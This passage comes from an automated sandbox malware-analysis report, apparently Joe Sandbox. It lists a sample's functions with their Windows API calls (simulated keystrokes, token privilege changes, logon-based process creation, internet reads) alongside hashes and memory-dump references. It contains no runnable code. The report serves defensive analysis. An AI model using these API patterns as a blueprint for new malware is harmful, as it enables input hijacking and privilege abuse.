Opcode ID: eeb4a145e60ada832bcf67c9910997e9072253dc6b1e44f21efdd6dbbf9a97b0
Instruction ID: d5552d62992e2d253e41e7dbcf2eb42a417cbcbb5d69f71aedfc4b6e083289e2
Opcode Fuzzy Hash: eeb4a145e60ada832bcf67c9910997e9072253dc6b1e44f21efdd6dbbf9a97b0
Instruction Fuzzy Hash: 5F41BF75A043029FCB08DF28C490A9AB3E6FF49324F10456EE55ACB3A1DB31AD41CF95

Function 006D4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006D439C
SetKeyboardState.USER32(00000080,?,00000001), ref: 006D43B8
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006D4425
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 006D4483

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d16340426542c1325cec57e0d2e6b769d2e46d330382870de47466747ca98f0b
Instruction ID: b71cc78ee5a5cd061d9fff1b107de9a723be7099da505eed1f62b8e708d359da
Opcode Fuzzy Hash: d16340426542c1325cec57e0d2e6b769d2e46d330382870de47466747ca98f0b
Instruction Fuzzy Hash: BB4104B0E00258ABEB308B6598447FD7BF7EB59311F04411BE481923C1CF788D95DB66

Function 006FEFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

GetCursorPos.USER32(?), ref: 006FEFE2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0070F3C3,?,?,?,?,?), ref: 006FEFF7
GetCursorPos.USER32(?), ref: 006FF041
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0070F3C3,?,?,?), ref: 006FF077

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: 069d0f869ed4f424cf8b0fa68d7dac8d7dd25c23e4f97a0eef4da9ec98affa4e
Instruction ID: 1dc2dca4a1c4ee9213e7fe3b0b4bf4c93c95d0bf55194c65016b0b4f69f7eabb
Opcode Fuzzy Hash: 069d0f869ed4f424cf8b0fa68d7dac8d7dd25c23e4f97a0eef4da9ec98affa4e
Instruction Fuzzy Hash: 3A21E135500128AFCB258F58C8A8EFA7BB6EF4A760F048069FA05573A2C7359D91DF90

Function 006CBC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006CBCD9
OpenProcessToken.ADVAPI32(00000000), ref: 006CBCE0
CloseHandle.KERNEL32(00000004), ref: 006CBCFA
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006CBD29

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: cd0cc1271f4ef23fe7aea9d7ebf4703918a41e498c10601d8d3c7c19692f899b
Instruction ID: ae6e914dc081ac26dcc82d3fc00063bd774e6a71b0b6fa61454b25f9a402f802
Opcode Fuzzy Hash: cd0cc1271f4ef23fe7aea9d7ebf4703918a41e498c10601d8d3c7c19692f899b
Instruction Fuzzy Hash: 07214F7210120DBBDF119F98DD4AFEE7BAAEF05315F049019FA01A61A0C77ADD61DB60

Function 006D220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 006D221E

Strings

|, xrefs: 006D224E
(, xrefs: 006D2264

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 28cc7205183a0938a55df374b361d69de0c990cead35060b470e08e265198906
Instruction ID: 06e23750611b33ef5d2bcbfa607cbda25f9b7081027c3940fb78a81d800d88fe
Opcode Fuzzy Hash: 28cc7205183a0938a55df374b361d69de0c990cead35060b470e08e265198906
Instruction Fuzzy Hash: C1321575A007069FC728CF69C490AAAB7F1FF58320B15C46EE49ADB7A1E770E941CB44

Function 006AAD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 006AAE5E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: e7c084650b5091c1f6b92769d247b3c4e6d868504e7f83ba5a837c98b30a38db
Instruction ID: 2cbe97fab6c1ad310d99e814cbd7b129d834b184c1e43c1c62e0cb8b344b9573
Opcode Fuzzy Hash: e7c084650b5091c1f6b92769d247b3c4e6d868504e7f83ba5a837c98b30a38db
Instruction Fuzzy Hash: D3A1F470104205FADB38BBA94C88DBF699FEB43751B10462FF501D66E2DB199C02EA77

Function 006E550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006E4A1E,00000000), ref: 006E55FD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006E5629

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 64c113c149ffbcb21904d8958ebdb042ef52d43bf9b8c189b1b8c0c2af215a18
Instruction ID: 0262a67f2d86f77836e5142f356f2be5e68335cf95596e58ebe01272ab111557
Opcode Fuzzy Hash: 64c113c149ffbcb21904d8958ebdb042ef52d43bf9b8c189b1b8c0c2af215a18
Instruction Fuzzy Hash: BA41C3B1501749BFEB109E96CC85EFBB7BEEB4071CF10401EF606A6291DA709E419B64

Function 006DEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006DEA95
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006DEAEF
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006DEB3C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: a50e12fcc6258b95180fe7c5bf7d4911b044ff2d0e9d7e7794b117f0b1f0e449
Instruction ID: 7a286d8ca0494d57e6b4494691e99ea5b3c39013cfb1b679f1fb5814c3ef20a6
Opcode Fuzzy Hash: a50e12fcc6258b95180fe7c5bf7d4911b044ff2d0e9d7e7794b117f0b1f0e449
Instruction Fuzzy Hash: 91214C35A00218EFCB00EFA5D894AEDBBB9FF49310F1484AAE805AB351DB35A915CB54

Function 006D702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006D704C
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 006D708D
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006D7098

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 1eb1c17bd65edebc205c5fa422dc3bbedcc53497783f12ba99db4649e407e4f8
Instruction ID: 85429f0975c8fd6d53bc7269345bc6218034e8a75b82bf0cdff34534d7415636
Opcode Fuzzy Hash: 1eb1c17bd65edebc205c5fa422dc3bbedcc53497783f12ba99db4649e407e4f8
Instruction Fuzzy Hash: 901130B1E00228BFDB108B98DC45AEE7BBDEB45B10F108152F910E62D0D6B45E059BA5

Function 006AAFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

Part of subcall function 006AB155: GetWindowLongW.USER32(?,000000EB), ref: 006AB166

GetParent.USER32(?), ref: 0070F4B5
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,006AADDD,?,?,?,00000006,?), ref: 0070F52F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: c0359b0379d9badc20073e41e4ee8824c1573bf2e524d397d4d9c43d71673848
Instruction ID: 1cfbb52a28a1065711190b89b579b334ac702896946a6b34b3e2a374929d6f2c
Opcode Fuzzy Hash: c0359b0379d9badc20073e41e4ee8824c1573bf2e524d397d4d9c43d71673848
Instruction Fuzzy Hash: 8C216F31200104AFCB38AF68DC48BEA3BA3AB07365F184264F5254B3E3C7755D12DB54

Function 006DFD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 006DFD71
FindClose.KERNEL32(00000000), ref: 006DFDA1

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: bb81a35364defbefbfcd8fec54f4166925ef7c83a3bffe188980f68819b157f1
Instruction ID: e6fd881817b7fc43b33235bcf0c9fcccff0674e50af3f4ab68cf4e33347060a3
Opcode Fuzzy Hash: bb81a35364defbefbfcd8fec54f4166925ef7c83a3bffe188980f68819b157f1
Instruction Fuzzy Hash: BD118E31A102059FD710EF28C845A6AB7EAFF85324F00851EF9A59B391DB34AC058B85

Function 006FF0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAF7D: GetWindowLongW.USER32(?,000000EB), ref: 006AAF8E

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0070F352,?,?,?), ref: 006FF115

Part of subcall function 006AB155: GetWindowLongW.USER32(?,000000EB), ref: 006AB166

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 006FF0FB

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 3457a0574d294f4125592610b9e6b008ddc657e2ba97c0b24a8ea74f51992196
Instruction ID: a1a3337b4fb0a021b15faa17478a03061e10f1c4d15f08e68d1ded9260cfde85
Opcode Fuzzy Hash: 3457a0574d294f4125592610b9e6b008ddc657e2ba97c0b24a8ea74f51992196
Instruction Fuzzy Hash: 20018C31200208EBDB21EF18DC45FAA3BA7EF86365F148528FA150B2A1C772AC12DB55

Function 006FF45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 006FF47D
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0070F42E,?,?,?,?,?), ref: 006FF4A6

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: 176bc5ef90a268bc961c4ab6582886ee0857f5f67384e8f48caa673b489d06d7
Instruction ID: ca38cc196da9bee899b07b79477649b16c0eb07491cd2ef173d32be5f0136795
Opcode Fuzzy Hash: 176bc5ef90a268bc961c4ab6582886ee0857f5f67384e8f48caa673b489d06d7
Instruction Fuzzy Hash: 00F01D72400118BFEB049F95DC059EE7BB9FF44351F10801AF901A21A0D3B5AA51DB64

Function 006DD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,006EC2E2,?,?,00000000,?), ref: 006DD73F
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,006EC2E2,?,?,00000000,?), ref: 006DD751

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6f7a0c31c1de507243463c526629e21333228659d8c5e0f3f2a3c39e6e5981b4
Instruction ID: 5ac11cbf972ca1db433a52fc5562a8d661fc4c5d7b5e7e4871ff813e401c7421
Opcode Fuzzy Hash: 6f7a0c31c1de507243463c526629e21333228659d8c5e0f3f2a3c39e6e5981b4
Instruction Fuzzy Hash: 48F0823550032DABDB21AFA4CC49FEA776DBF49361F008155B915D6181D6349940CBA4

Function 006D4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 006D4B89
keybd_event.USER32(?,7707C0D0,?,00000000), ref: 006D4B9C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 1cda70fbb353876df0f447ef1a557295347cd89316f3b88b2ce53c68c5a8753b
Instruction ID: 0a8afd636d02006c3ec9f2e35528331e9184124bedbc28fabadd1d49d5f67dda
Opcode Fuzzy Hash: 1cda70fbb353876df0f447ef1a557295347cd89316f3b88b2ce53c68c5a8753b
Instruction Fuzzy Hash: 87F06D7080024DAFDB058FA4C805BFE7BB5AF04305F00C40AF961A5291D779CA129FA4

Function 006CB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006CB9EC), ref: 006CB8C5
CloseHandle.KERNEL32(?,?,006CB9EC), ref: 006CB8D7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 6fac2bfd4e4b1d83b43f8b63c100c82dcc03e4763beb19b5899115ecba02afe6
Instruction ID: 5bb97642fc7c444b85c4a4889716592864a83ca358bcdcd62d732e13478fe9bc
Opcode Fuzzy Hash: 6fac2bfd4e4b1d83b43f8b63c100c82dcc03e4763beb19b5899115ecba02afe6
Instruction Fuzzy Hash: 4FE0BFB1004511AEE7662B64EC05DF77BEAEF04311B11C41DF55681470D7655CD0DB14

Function 006FF594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 006FF59C
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0070F3AD,?,?,?,?), ref: 006FF5C6

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 5dcd6117f0252203c9e2b79860dd98316fc0fef06bbbdaaebc431f6615ce2143
Instruction ID: 7f4ab214a97c5786090d070a60be8715254fe99f6cb6dd5099140d77437a9542
